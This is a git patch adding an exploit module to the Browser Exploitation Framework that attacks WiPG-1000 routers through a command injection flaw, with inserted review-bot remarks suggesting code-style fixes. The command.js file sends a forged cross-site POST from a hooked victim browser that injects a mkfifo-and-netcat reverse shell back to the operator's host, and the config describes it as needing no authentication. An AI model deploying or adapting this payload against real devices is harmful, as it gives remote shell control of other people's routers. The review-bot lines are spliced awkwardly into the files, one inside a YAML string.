From 46a395e04477315fde4dcb3d8cb158c2f213b1c3 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sat, 22 Apr 2017 23:34:07 +0000
Subject: [PATCH] Add WiPG-1000 Command Injection exploit module
---
 .../router/wipg1000_cmd_injection/command.js | 32 +++++++++++++++++++
 .../router/wipg1000_cmd_injection/config.yaml | 15 +++++++++
 .../router/wipg1000_cmd_injection/module.rb | 25 +++++++++++++++
 3 files changed, 72 insertions(+)
 create mode 100644 modules/exploits/router/wipg1000_cmd_injection/command.js
 create mode 100644 modules/exploits/router/wipg1000_cmd_injection/config.yaml
 create mode 100644 modules/exploits/router/wipg1000_cmd_injection/module.rb
diff --git a/modules/exploits/router/wipg1000_cmd_injection/command.js b/modules/exploits/router/wipg1000_cmd_injection/command.js
new file mode 100644
index 000000000..79ec7bea3
--- /dev/null
+++ b/modules/exploits/router/wipg1000_cmd_injection/command.js
@@ -0,0 +1,32 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var lhost = '<%= @lhost %>';
+ var lport = '<%= @lport %>';
+ var timeout = 15;
+
+ var url = "http://" + rhost + ":" + rport + "/cgi-bin/rdfs.cgi";
+ var fifo = '/tmp/' + Math.random().toString(36).substring(7);
+ var payload = 'mkfifo ' + fifo + '; nc ' + lhost + ' ' + lport + ' 0<' + fifo + ' | /bin/sh >' + fifo + ' 2>&1; rm ' + fifo;
+
+ beef.debug("[WiPG-1000 Command Injection] Sending payload: " + url);
+ var wipg1000_cmd_injection_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(
+ url, 'POST', 'application/x-www-form-urlencoded', [
+ {'type':'hidden', 'name':'Client', 'value':';' + payload + ';'},
+ {'type':'hidden', 'name':'Download', 'value':'Download'}
+ ]);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(wipg1000_cmd_injection_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/wipg1000_cmd_injection/config.yaml b/modules/exploits/router/wipg1000_cmd_injection/config.yaml
new file mode 100644
index 000000000..fa3f4f338
--- /dev/null
+++ b/modules/exploits/router/wipg1000_cmd_injection/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ wipg1000_cmd_injection:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "WiPG-1000 Command Injection"
+ description: "This module exploits a command injection vulnerability in WiPG-1000 routers.
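Review bot: `cleanup = function() {...}` near the end of the `beef.execute` callback omits `var`, so it is assigned as a global on the hooked page and can be overwritten by any other module that uses the same name before the 15-second timer fires, and `setTimeout("cleanup()", timeout*1000)` then resolves that name by evaluating a string. Declaring it locally and passing the function reference avoids both problems: `var cleanup = function() { document.body.removeChild(wipg1000_cmd_injection_iframe_<%= @command_id %>); };` followed by `setTimeout(cleanup, timeout*1000);`. The iframe variable is already a local of the same callback, so the closure keeps working unchanged.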
An authenticated session is not required.

Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local interface and port specified below.

This module has not been tested."
+ authors: ["Matthias Brun"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/router/wipg1000_cmd_injection/module.rb b/modules/exploits/router/wipg1000_cmd_injection/module.rb
new file mode 100644
index 000000000..10b53fe19
--- /dev/null
+++ b/modules/exploits/router/wipg1000_cmd_injection/module.rb
@@ -0,0 +1,25 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Wipg1000_cmd_injection < BeEF::Core::Command
+
+ def self.options
+ @configuration = BeEF::Core::Configuration.instance
+ lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+ lhost = '' if lhost.to_s.eql?('0.0.0.0')
+
+ return [
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.100.10'},
+ { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+ { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
+ { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
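Review bot: `self.options` writes the configuration singleton into the class-level instance variable `@configuration` even though it is read only inside this method, so every call leaks state onto the class and the `@` prefix suggests a dependency that does not exist. A local does the same job: `configuration = BeEF::Core::Configuration.instance` followed by `lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")`. The explicit `return` in front of the array literal is redundant in Ruby, and `lhost.to_s.eql?('0.0.0.0')` is more idiomatically written as `lhost.to_s == '0.0.0.0'`.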